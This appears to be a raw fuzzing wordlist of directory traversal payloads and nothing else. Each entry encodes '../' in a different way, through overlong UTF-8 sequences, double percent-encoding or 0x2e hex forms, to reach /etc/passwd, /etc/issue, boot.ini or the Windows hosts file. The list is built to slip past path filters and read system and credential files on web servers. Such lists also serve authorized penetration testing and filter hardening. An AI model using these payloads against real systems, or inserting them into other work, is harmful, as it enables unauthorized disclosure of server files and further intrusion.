-%%c0%6e%c0%6e%%32%%66%%c0%6e%c0%6e%%32%%66%%c0%6e%c0%6e%%32%%66%%c0%6e%c0%6e%%32%%66%%c0%6e%c0%6e%%32%%66%%c0%6e%c0%6e%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -%%c0%6e%c0%6e%%35%%63etc%%35%%63passwd -%%c0%6e%c0%6e%%35%%63etc%%35%%63issue -%%c0%6e%c0%6e%%35%%63boot.ini -%%c0%6e%c0%6e%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -%%c0%6e%c0%6e%%35%%63%%c0%6e%c0%6e%%35%%63etc%%35%%63passwd -%%c0%6e%c0%6e%%35%%63%%c0%6e%c0%6e%%35%%63etc%%35%%63issue -%%c0%6e%c0%6e%%35%%63%%c0%6e%c0%6e%%35%%63boot.ini -%%c0%6e%c0%6e%%35%%63%%c0%6e%c0%6e%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -%%c0%6e%c0%6e%%35%%63%%c0%6e%c0%6e%%35%%63%%c0%6e%c0%6e%%35%%63etc%%35%%63passwd -%%c0%6e%c0%6e%%35%%63%%c0%6e%c0%6e%%35%%63%%c0%6e%c0%6e%%35%%63etc%%35%%63issue -%%c0%6e%c0%6e%%35%%63%%c0%6e%c0%6e%%35%%63%%c0%6e%c0%6e%%35%%63boot.ini -%%c0%6e%c0%6e%%35%%63%%c0%6e%c0%6e%%35%%63%%c0%6e%c0%6e%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -%%c0%6e%c0%6e%%35%%63%%c0%6e%c0%6e%%35%%63%%c0%6e%c0%6e%%35%%63%%c0%6e%c0%6e%%35%%63etc%%35%%63passwd -%%c0%6e%c0%6e%%35%%63%%c0%6e%c0%6e%%35%%63%%c0%6e%c0%6e%%35%%63%%c0%6e%c0%6e%%35%%63etc%%35%%63issue -%%c0%6e%c0%6e%%35%%63%%c0%6e%c0%6e%%35%%63%%c0%6e%c0%6e%%35%%63%%c0%6e%c0%6e%%35%%63boot.ini -%%c0%6e%c0%6e%%35%%63%%c0%6e%c0%6e%%35%%63%%c0%6e%c0%6e%%35%%63%%c0%6e%c0%6e%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -%%c0%6e%c0%6e%%35%%63%%c0%6e%c0%6e%%35%%63%%c0%6e%c0%6e%%35%%63%%c0%6e%c0%6e%%35%%63%%c0%6e%c0%6e%%35%%63etc%%35%%63passwd -%%c0%6e%c0%6e%%35%%63%%c0%6e%c0%6e%%35%%63%%c0%6e%c0%6e%%35%%63%%c0%6e%c0%6e%%35%%63%%c0%6e%c0%6e%%35%%63etc%%35%%63issue -%%c0%6e%c0%6e%%35%%63%%c0%6e%c0%6e%%35%%63%%c0%6e%c0%6e%%35%%63%%c0%6e%c0%6e%%35%%63%%c0%6e%c0%6e%%35%%63boot.ini -%%c0%6e%c0%6e%%35%%63%%c0%6e%c0%6e%%35%%63%%c0%6e%c0%6e%%35%%63%%c0%6e%c0%6e%%35%%63%%c0%6e%c0%6e%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -%%c0%6e%c0%6e%%35%%63%%c0%6e%c0%6e%%35%%63%%c0%6e%c0%6e%%35%%63%%c0%6e%c0%6e%%35%%63%%c0%6e%c0%6e%%35%%63%%c0%6e%c0%6e%%35%%63etc%%35%%63passwd -%%c0%6e%c0%6e%%35%%63%%c0%6e%c0%6e%%35%%63%%c0%6e%c0%6e%%35%%63%%c0%6e%c0%6e%%35%%63%%c0%6e%c0%6e%%35%%63%%c0%6e%c0%6e%%35%%63etc%%35%%63issue -%%c0%6e%c0%6e%%35%%63%%c0%6e%c0%6e%%35%%63%%c0%6e%c0%6e%%35%%63%%c0%6e%c0%6e%%35%%63%%c0%6e%c0%6e%%35%%63%%c0%6e%c0%6e%%35%%63boot.ini -%%c0%6e%c0%6e%%35%%63%%c0%6e%c0%6e%%35%%63%%c0%6e%c0%6e%%35%%63%%c0%6e%c0%6e%%35%%63%%c0%6e%c0%6e%%35%%63%%c0%6e%c0%6e%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -%%c0%6e%c0%6e%e0%80%afetc%e0%80%afpasswd -%%c0%6e%c0%6e%e0%80%afetc%e0%80%afissue -%%c0%6e%c0%6e%e0%80%afboot.ini -%%c0%6e%c0%6e%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -%%c0%6e%c0%6e%e0%80%af%%c0%6e%c0%6e%e0%80%afetc%e0%80%afpasswd -%%c0%6e%c0%6e%e0%80%af%%c0%6e%c0%6e%e0%80%afetc%e0%80%afissue -%%c0%6e%c0%6e%e0%80%af%%c0%6e%c0%6e%e0%80%afboot.ini -%%c0%6e%c0%6e%e0%80%af%%c0%6e%c0%6e%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -%%c0%6e%c0%6e%e0%80%af%%c0%6e%c0%6e%e0%80%af%%c0%6e%c0%6e%e0%80%afetc%e0%80%afpasswd -%%c0%6e%c0%6e%e0%80%af%%c0%6e%c0%6e%e0%80%af%%c0%6e%c0%6e%e0%80%afetc%e0%80%afissue -%%c0%6e%c0%6e%e0%80%af%%c0%6e%c0%6e%e0%80%af%%c0%6e%c0%6e%e0%80%afboot.ini -%%c0%6e%c0%6e%e0%80%af%%c0%6e%c0%6e%e0%80%af%%c0%6e%c0%6e%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -%%c0%6e%c0%6e%e0%80%af%%c0%6e%c0%6e%e0%80%af%%c0%6e%c0%6e%e0%80%af%%c0%6e%c0%6e%e0%80%afetc%e0%80%afpasswd -%%c0%6e%c0%6e%e0%80%af%%c0%6e%c0%6e%e0%80%af%%c0%6e%c0%6e%e0%80%af%%c0%6e%c0%6e%e0%80%afetc%e0%80%afissue -%%c0%6e%c0%6e%e0%80%af%%c0%6e%c0%6e%e0%80%af%%c0%6e%c0%6e%e0%80%af%%c0%6e%c0%6e%e0%80%afboot.ini -%%c0%6e%c0%6e%e0%80%af%%c0%6e%c0%6e%e0%80%af%%c0%6e%c0%6e%e0%80%af%%c0%6e%c0%6e%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -%%c0%6e%c0%6e%e0%80%af%%c0%6e%c0%6e%e0%80%af%%c0%6e%c0%6e%e0%80%af%%c0%6e%c0%6e%e0%80%af%%c0%6e%c0%6e%e0%80%afetc%e0%80%afpasswd -%%c0%6e%c0%6e%e0%80%af%%c0%6e%c0%6e%e0%80%af%%c0%6e%c0%6e%e0%80%af%%c0%6e%c0%6e%e0%80%af%%c0%6e%c0%6e%e0%80%afetc%e0%80%afissue -%%c0%6e%c0%6e%e0%80%af%%c0%6e%c0%6e%e0%80%af%%c0%6e%c0%6e%e0%80%af%%c0%6e%c0%6e%e0%80%af%%c0%6e%c0%6e%e0%80%afboot.ini -%%c0%6e%c0%6e%e0%80%af%%c0%6e%c0%6e%e0%80%af%%c0%6e%c0%6e%e0%80%af%%c0%6e%c0%6e%e0%80%af%%c0%6e%c0%6e%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -%%c0%6e%c0%6e%e0%80%af%%c0%6e%c0%6e%e0%80%af%%c0%6e%c0%6e%e0%80%af%%c0%6e%c0%6e%e0%80%af%%c0%6e%c0%6e%e0%80%af%%c0%6e%c0%6e%e0%80%afetc%e0%80%afpasswd -%%c0%6e%c0%6e%e0%80%af%%c0%6e%c0%6e%e0%80%af%%c0%6e%c0%6e%e0%80%af%%c0%6e%c0%6e%e0%80%af%%c0%6e%c0%6e%e0%80%af%%c0%6e%c0%6e%e0%80%afetc%e0%80%afissue -%%c0%6e%c0%6e%e0%80%af%%c0%6e%c0%6e%e0%80%af%%c0%6e%c0%6e%e0%80%af%%c0%6e%c0%6e%e0%80%af%%c0%6e%c0%6e%e0%80%af%%c0%6e%c0%6e%e0%80%afboot.ini -%%c0%6e%c0%6e%e0%80%af%%c0%6e%c0%6e%e0%80%af%%c0%6e%c0%6e%e0%80%af%%c0%6e%c0%6e%e0%80%af%%c0%6e%c0%6e%e0%80%af%%c0%6e%c0%6e%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -%%c0%6e%c0%6e%25c1%259cetc%25c1%259cpasswd -%%c0%6e%c0%6e%25c1%259cetc%25c1%259cissue -%%c0%6e%c0%6e%25c1%259cboot.ini -%%c0%6e%c0%6e%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -%%c0%6e%c0%6e%25c1%259c%%c0%6e%c0%6e%25c1%259cetc%25c1%259cpasswd -%%c0%6e%c0%6e%25c1%259c%%c0%6e%c0%6e%25c1%259cetc%25c1%259cissue -%%c0%6e%c0%6e%25c1%259c%%c0%6e%c0%6e%25c1%259cboot.ini -%%c0%6e%c0%6e%25c1%259c%%c0%6e%c0%6e%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -%%c0%6e%c0%6e%25c1%259c%%c0%6e%c0%6e%25c1%259c%%c0%6e%c0%6e%25c1%259cetc%25c1%259cpasswd -%%c0%6e%c0%6e%25c1%259c%%c0%6e%c0%6e%25c1%259c%%c0%6e%c0%6e%25c1%259cetc%25c1%259cissue -%%c0%6e%c0%6e%25c1%259c%%c0%6e%c0%6e%25c1%259c%%c0%6e%c0%6e%25c1%259cboot.ini -%%c0%6e%c0%6e%25c1%259c%%c0%6e%c0%6e%25c1%259c%%c0%6e%c0%6e%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -%%c0%6e%c0%6e%25c1%259c%%c0%6e%c0%6e%25c1%259c%%c0%6e%c0%6e%25c1%259c%%c0%6e%c0%6e%25c1%259cetc%25c1%259cpasswd -%%c0%6e%c0%6e%25c1%259c%%c0%6e%c0%6e%25c1%259c%%c0%6e%c0%6e%25c1%259c%%c0%6e%c0%6e%25c1%259cetc%25c1%259cissue -%%c0%6e%c0%6e%25c1%259c%%c0%6e%c0%6e%25c1%259c%%c0%6e%c0%6e%25c1%259c%%c0%6e%c0%6e%25c1%259cboot.ini -%%c0%6e%c0%6e%25c1%259c%%c0%6e%c0%6e%25c1%259c%%c0%6e%c0%6e%25c1%259c%%c0%6e%c0%6e%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -%%c0%6e%c0%6e%25c1%259c%%c0%6e%c0%6e%25c1%259c%%c0%6e%c0%6e%25c1%259c%%c0%6e%c0%6e%25c1%259c%%c0%6e%c0%6e%25c1%259cetc%25c1%259cpasswd -%%c0%6e%c0%6e%25c1%259c%%c0%6e%c0%6e%25c1%259c%%c0%6e%c0%6e%25c1%259c%%c0%6e%c0%6e%25c1%259c%%c0%6e%c0%6e%25c1%259cetc%25c1%259cissue -%%c0%6e%c0%6e%25c1%259c%%c0%6e%c0%6e%25c1%259c%%c0%6e%c0%6e%25c1%259c%%c0%6e%c0%6e%25c1%259c%%c0%6e%c0%6e%25c1%259cboot.ini -%%c0%6e%c0%6e%25c1%259c%%c0%6e%c0%6e%25c1%259c%%c0%6e%c0%6e%25c1%259c%%c0%6e%c0%6e%25c1%259c%%c0%6e%c0%6e%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -%%c0%6e%c0%6e%25c1%259c%%c0%6e%c0%6e%25c1%259c%%c0%6e%c0%6e%25c1%259c%%c0%6e%c0%6e%25c1%259c%%c0%6e%c0%6e%25c1%259c%%c0%6e%c0%6e%25c1%259cetc%25c1%259cpasswd -%%c0%6e%c0%6e%25c1%259c%%c0%6e%c0%6e%25c1%259c%%c0%6e%c0%6e%25c1%259c%%c0%6e%c0%6e%25c1%259c%%c0%6e%c0%6e%25c1%259c%%c0%6e%c0%6e%25c1%259cetc%25c1%259cissue -%%c0%6e%c0%6e%25c1%259c%%c0%6e%c0%6e%25c1%259c%%c0%6e%c0%6e%25c1%259c%%c0%6e%c0%6e%25c1%259c%%c0%6e%c0%6e%25c1%259c%%c0%6e%c0%6e%25c1%259cboot.ini -%%c0%6e%c0%6e%25c1%259c%%c0%6e%c0%6e%25c1%259c%%c0%6e%c0%6e%25c1%259c%%c0%6e%c0%6e%25c1%259c%%c0%6e%c0%6e%25c1%259c%%c0%6e%c0%6e%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -%%c0%6e%c0%6e%25c0%25afetc%25c0%25afpasswd -%%c0%6e%c0%6e%25c0%25afetc%25c0%25afissue -%%c0%6e%c0%6e%25c0%25afboot.ini -%%c0%6e%c0%6e%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -%%c0%6e%c0%6e%25c0%25af%%c0%6e%c0%6e%25c0%25afetc%25c0%25afpasswd -%%c0%6e%c0%6e%25c0%25af%%c0%6e%c0%6e%25c0%25afetc%25c0%25afissue -%%c0%6e%c0%6e%25c0%25af%%c0%6e%c0%6e%25c0%25afboot.ini -%%c0%6e%c0%6e%25c0%25af%%c0%6e%c0%6e%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -%%c0%6e%c0%6e%25c0%25af%%c0%6e%c0%6e%25c0%25af%%c0%6e%c0%6e%25c0%25afetc%25c0%25afpasswd -%%c0%6e%c0%6e%25c0%25af%%c0%6e%c0%6e%25c0%25af%%c0%6e%c0%6e%25c0%25afetc%25c0%25afissue -%%c0%6e%c0%6e%25c0%25af%%c0%6e%c0%6e%25c0%25af%%c0%6e%c0%6e%25c0%25afboot.ini -%%c0%6e%c0%6e%25c0%25af%%c0%6e%c0%6e%25c0%25af%%c0%6e%c0%6e%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -%%c0%6e%c0%6e%25c0%25af%%c0%6e%c0%6e%25c0%25af%%c0%6e%c0%6e%25c0%25af%%c0%6e%c0%6e%25c0%25afetc%25c0%25afpasswd -%%c0%6e%c0%6e%25c0%25af%%c0%6e%c0%6e%25c0%25af%%c0%6e%c0%6e%25c0%25af%%c0%6e%c0%6e%25c0%25afetc%25c0%25afissue -%%c0%6e%c0%6e%25c0%25af%%c0%6e%c0%6e%25c0%25af%%c0%6e%c0%6e%25c0%25af%%c0%6e%c0%6e%25c0%25afboot.ini -%%c0%6e%c0%6e%25c0%25af%%c0%6e%c0%6e%25c0%25af%%c0%6e%c0%6e%25c0%25af%%c0%6e%c0%6e%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -%%c0%6e%c0%6e%25c0%25af%%c0%6e%c0%6e%25c0%25af%%c0%6e%c0%6e%25c0%25af%%c0%6e%c0%6e%25c0%25af%%c0%6e%c0%6e%25c0%25afetc%25c0%25afpasswd -%%c0%6e%c0%6e%25c0%25af%%c0%6e%c0%6e%25c0%25af%%c0%6e%c0%6e%25c0%25af%%c0%6e%c0%6e%25c0%25af%%c0%6e%c0%6e%25c0%25afetc%25c0%25afissue -%%c0%6e%c0%6e%25c0%25af%%c0%6e%c0%6e%25c0%25af%%c0%6e%c0%6e%25c0%25af%%c0%6e%c0%6e%25c0%25af%%c0%6e%c0%6e%25c0%25afboot.ini -%%c0%6e%c0%6e%25c0%25af%%c0%6e%c0%6e%25c0%25af%%c0%6e%c0%6e%25c0%25af%%c0%6e%c0%6e%25c0%25af%%c0%6e%c0%6e%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -%%c0%6e%c0%6e%25c0%25af%%c0%6e%c0%6e%25c0%25af%%c0%6e%c0%6e%25c0%25af%%c0%6e%c0%6e%25c0%25af%%c0%6e%c0%6e%25c0%25af%%c0%6e%c0%6e%25c0%25afetc%25c0%25afpasswd -%%c0%6e%c0%6e%25c0%25af%%c0%6e%c0%6e%25c0%25af%%c0%6e%c0%6e%25c0%25af%%c0%6e%c0%6e%25c0%25af%%c0%6e%c0%6e%25c0%25af%%c0%6e%c0%6e%25c0%25afetc%25c0%25afissue -%%c0%6e%c0%6e%25c0%25af%%c0%6e%c0%6e%25c0%25af%%c0%6e%c0%6e%25c0%25af%%c0%6e%c0%6e%25c0%25af%%c0%6e%c0%6e%25c0%25af%%c0%6e%c0%6e%25c0%25afboot.ini -%%c0%6e%c0%6e%25c0%25af%%c0%6e%c0%6e%25c0%25af%%c0%6e%c0%6e%25c0%25af%%c0%6e%c0%6e%25c0%25af%%c0%6e%c0%6e%25c0%25af%%c0%6e%c0%6e%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -%%c0%6e%c0%6e%f0%80%80%afetc%f0%80%80%afpasswd -%%c0%6e%c0%6e%f0%80%80%afetc%f0%80%80%afissue -%%c0%6e%c0%6e%f0%80%80%afboot.ini -%%c0%6e%c0%6e%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -%%c0%6e%c0%6e%f0%80%80%af%%c0%6e%c0%6e%f0%80%80%afetc%f0%80%80%afpasswd -%%c0%6e%c0%6e%f0%80%80%af%%c0%6e%c0%6e%f0%80%80%afetc%f0%80%80%afissue -%%c0%6e%c0%6e%f0%80%80%af%%c0%6e%c0%6e%f0%80%80%afboot.ini -%%c0%6e%c0%6e%f0%80%80%af%%c0%6e%c0%6e%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -%%c0%6e%c0%6e%f0%80%80%af%%c0%6e%c0%6e%f0%80%80%af%%c0%6e%c0%6e%f0%80%80%afetc%f0%80%80%afpasswd -%%c0%6e%c0%6e%f0%80%80%af%%c0%6e%c0%6e%f0%80%80%af%%c0%6e%c0%6e%f0%80%80%afetc%f0%80%80%afissue -%%c0%6e%c0%6e%f0%80%80%af%%c0%6e%c0%6e%f0%80%80%af%%c0%6e%c0%6e%f0%80%80%afboot.ini -%%c0%6e%c0%6e%f0%80%80%af%%c0%6e%c0%6e%f0%80%80%af%%c0%6e%c0%6e%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -%%c0%6e%c0%6e%f0%80%80%af%%c0%6e%c0%6e%f0%80%80%af%%c0%6e%c0%6e%f0%80%80%af%%c0%6e%c0%6e%f0%80%80%afetc%f0%80%80%afpasswd -%%c0%6e%c0%6e%f0%80%80%af%%c0%6e%c0%6e%f0%80%80%af%%c0%6e%c0%6e%f0%80%80%af%%c0%6e%c0%6e%f0%80%80%afetc%f0%80%80%afissue -%%c0%6e%c0%6e%f0%80%80%af%%c0%6e%c0%6e%f0%80%80%af%%c0%6e%c0%6e%f0%80%80%af%%c0%6e%c0%6e%f0%80%80%afboot.ini -%%c0%6e%c0%6e%f0%80%80%af%%c0%6e%c0%6e%f0%80%80%af%%c0%6e%c0%6e%f0%80%80%af%%c0%6e%c0%6e%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -%%c0%6e%c0%6e%f0%80%80%af%%c0%6e%c0%6e%f0%80%80%af%%c0%6e%c0%6e%f0%80%80%af%%c0%6e%c0%6e%f0%80%80%af%%c0%6e%c0%6e%f0%80%80%afetc%f0%80%80%afpasswd -%%c0%6e%c0%6e%f0%80%80%af%%c0%6e%c0%6e%f0%80%80%af%%c0%6e%c0%6e%f0%80%80%af%%c0%6e%c0%6e%f0%80%80%af%%c0%6e%c0%6e%f0%80%80%afetc%f0%80%80%afissue -%%c0%6e%c0%6e%f0%80%80%af%%c0%6e%c0%6e%f0%80%80%af%%c0%6e%c0%6e%f0%80%80%af%%c0%6e%c0%6e%f0%80%80%af%%c0%6e%c0%6e%f0%80%80%afboot.ini -%%c0%6e%c0%6e%f0%80%80%af%%c0%6e%c0%6e%f0%80%80%af%%c0%6e%c0%6e%f0%80%80%af%%c0%6e%c0%6e%f0%80%80%af%%c0%6e%c0%6e%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -%%c0%6e%c0%6e%f0%80%80%af%%c0%6e%c0%6e%f0%80%80%af%%c0%6e%c0%6e%f0%80%80%af%%c0%6e%c0%6e%f0%80%80%af%%c0%6e%c0%6e%f0%80%80%af%%c0%6e%c0%6e%f0%80%80%afetc%f0%80%80%afpasswd -%%c0%6e%c0%6e%f0%80%80%af%%c0%6e%c0%6e%f0%80%80%af%%c0%6e%c0%6e%f0%80%80%af%%c0%6e%c0%6e%f0%80%80%af%%c0%6e%c0%6e%f0%80%80%af%%c0%6e%c0%6e%f0%80%80%afetc%f0%80%80%afissue -%%c0%6e%c0%6e%f0%80%80%af%%c0%6e%c0%6e%f0%80%80%af%%c0%6e%c0%6e%f0%80%80%af%%c0%6e%c0%6e%f0%80%80%af%%c0%6e%c0%6e%f0%80%80%af%%c0%6e%c0%6e%f0%80%80%afboot.ini -%%c0%6e%c0%6e%f0%80%80%af%%c0%6e%c0%6e%f0%80%80%af%%c0%6e%c0%6e%f0%80%80%af%%c0%6e%c0%6e%f0%80%80%af%%c0%6e%c0%6e%f0%80%80%af%%c0%6e%c0%6e%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -%%c0%6e%c0%6e%f8%80%80%80%afetc%f8%80%80%80%afpasswd -%%c0%6e%c0%6e%f8%80%80%80%afetc%f8%80%80%80%afissue -%%c0%6e%c0%6e%f8%80%80%80%afboot.ini -%%c0%6e%c0%6e%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -%%c0%6e%c0%6e%f8%80%80%80%af%%c0%6e%c0%6e%f8%80%80%80%afetc%f8%80%80%80%afpasswd -%%c0%6e%c0%6e%f8%80%80%80%af%%c0%6e%c0%6e%f8%80%80%80%afetc%f8%80%80%80%afissue -%%c0%6e%c0%6e%f8%80%80%80%af%%c0%6e%c0%6e%f8%80%80%80%afboot.ini -%%c0%6e%c0%6e%f8%80%80%80%af%%c0%6e%c0%6e%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -%%c0%6e%c0%6e%f8%80%80%80%af%%c0%6e%c0%6e%f8%80%80%80%af%%c0%6e%c0%6e%f8%80%80%80%afetc%f8%80%80%80%afpasswd -%%c0%6e%c0%6e%f8%80%80%80%af%%c0%6e%c0%6e%f8%80%80%80%af%%c0%6e%c0%6e%f8%80%80%80%afetc%f8%80%80%80%afissue -%%c0%6e%c0%6e%f8%80%80%80%af%%c0%6e%c0%6e%f8%80%80%80%af%%c0%6e%c0%6e%f8%80%80%80%afboot.ini -%%c0%6e%c0%6e%f8%80%80%80%af%%c0%6e%c0%6e%f8%80%80%80%af%%c0%6e%c0%6e%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -%%c0%6e%c0%6e%f8%80%80%80%af%%c0%6e%c0%6e%f8%80%80%80%af%%c0%6e%c0%6e%f8%80%80%80%af%%c0%6e%c0%6e%f8%80%80%80%afetc%f8%80%80%80%afpasswd -%%c0%6e%c0%6e%f8%80%80%80%af%%c0%6e%c0%6e%f8%80%80%80%af%%c0%6e%c0%6e%f8%80%80%80%af%%c0%6e%c0%6e%f8%80%80%80%afetc%f8%80%80%80%afissue -%%c0%6e%c0%6e%f8%80%80%80%af%%c0%6e%c0%6e%f8%80%80%80%af%%c0%6e%c0%6e%f8%80%80%80%af%%c0%6e%c0%6e%f8%80%80%80%afboot.ini -%%c0%6e%c0%6e%f8%80%80%80%af%%c0%6e%c0%6e%f8%80%80%80%af%%c0%6e%c0%6e%f8%80%80%80%af%%c0%6e%c0%6e%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -%%c0%6e%c0%6e%f8%80%80%80%af%%c0%6e%c0%6e%f8%80%80%80%af%%c0%6e%c0%6e%f8%80%80%80%af%%c0%6e%c0%6e%f8%80%80%80%af%%c0%6e%c0%6e%f8%80%80%80%afetc%f8%80%80%80%afpasswd -%%c0%6e%c0%6e%f8%80%80%80%af%%c0%6e%c0%6e%f8%80%80%80%af%%c0%6e%c0%6e%f8%80%80%80%af%%c0%6e%c0%6e%f8%80%80%80%af%%c0%6e%c0%6e%f8%80%80%80%afetc%f8%80%80%80%afissue -%%c0%6e%c0%6e%f8%80%80%80%af%%c0%6e%c0%6e%f8%80%80%80%af%%c0%6e%c0%6e%f8%80%80%80%af%%c0%6e%c0%6e%f8%80%80%80%af%%c0%6e%c0%6e%f8%80%80%80%afboot.ini -%%c0%6e%c0%6e%f8%80%80%80%af%%c0%6e%c0%6e%f8%80%80%80%af%%c0%6e%c0%6e%f8%80%80%80%af%%c0%6e%c0%6e%f8%80%80%80%af%%c0%6e%c0%6e%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -%%c0%6e%c0%6e%f8%80%80%80%af%%c0%6e%c0%6e%f8%80%80%80%af%%c0%6e%c0%6e%f8%80%80%80%af%%c0%6e%c0%6e%f8%80%80%80%af%%c0%6e%c0%6e%f8%80%80%80%af%%c0%6e%c0%6e%f8%80%80%80%afetc%f8%80%80%80%afpasswd -%%c0%6e%c0%6e%f8%80%80%80%af%%c0%6e%c0%6e%f8%80%80%80%af%%c0%6e%c0%6e%f8%80%80%80%af%%c0%6e%c0%6e%f8%80%80%80%af%%c0%6e%c0%6e%f8%80%80%80%af%%c0%6e%c0%6e%f8%80%80%80%afetc%f8%80%80%80%afissue -%%c0%6e%c0%6e%f8%80%80%80%af%%c0%6e%c0%6e%f8%80%80%80%af%%c0%6e%c0%6e%f8%80%80%80%af%%c0%6e%c0%6e%f8%80%80%80%af%%c0%6e%c0%6e%f8%80%80%80%af%%c0%6e%c0%6e%f8%80%80%80%afboot.ini -%%c0%6e%c0%6e%f8%80%80%80%af%%c0%6e%c0%6e%f8%80%80%80%af%%c0%6e%c0%6e%f8%80%80%80%af%%c0%6e%c0%6e%f8%80%80%80%af%%c0%6e%c0%6e%f8%80%80%80%af%%c0%6e%c0%6e%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -0x2e0x2e/etc/passwd -0x2e0x2e/etc/issue -0x2e0x2e/boot.ini -0x2e0x2e/windows/system32/drivers/etc/hosts -0x2e0x2e/0x2e0x2e/etc/passwd -0x2e0x2e/0x2e0x2e/etc/issue -0x2e0x2e/0x2e0x2e/boot.ini -0x2e0x2e/0x2e0x2e/windows/system32/drivers/etc/hosts -0x2e0x2e/0x2e0x2e/0x2e0x2e/etc/passwd -0x2e0x2e/0x2e0x2e/0x2e0x2e/etc/issue -0x2e0x2e/0x2e0x2e/0x2e0x2e/boot.ini -0x2e0x2e/0x2e0x2e/0x2e0x2e/windows/system32/drivers/etc/hosts -0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/etc/passwd -0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/etc/issue -0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/boot.ini -0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/windows/system32/drivers/etc/hosts -0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/etc/passwd -0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/etc/issue -0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/boot.ini -0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/windows/system32/drivers/etc/hosts -0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/etc/passwd -0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/etc/issue -0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/boot.ini -0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/windows/system32/drivers/etc/hosts -0x2e0x2e\etc\passwd -0x2e0x2e\etc\issue -0x2e0x2e\boot.ini -0x2e0x2e\windows\system32\drivers\etc\hosts -0x2e0x2e\0x2e0x2e\etc\passwd -0x2e0x2e\0x2e0x2e\etc\issue -0x2e0x2e\0x2e0x2e\boot.ini -0x2e0x2e\0x2e0x2e\windows\system32\drivers\etc\hosts -0x2e0x2e\0x2e0x2e\0x2e0x2e\etc\passwd -0x2e0x2e\0x2e0x2e\0x2e0x2e\etc\issue -0x2e0x2e\0x2e0x2e\0x2e0x2e\boot.ini -0x2e0x2e\0x2e0x2e\0x2e0x2e\windows\system32\drivers\etc\hosts -0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\etc\passwd -0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\etc\issue -0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\boot.ini 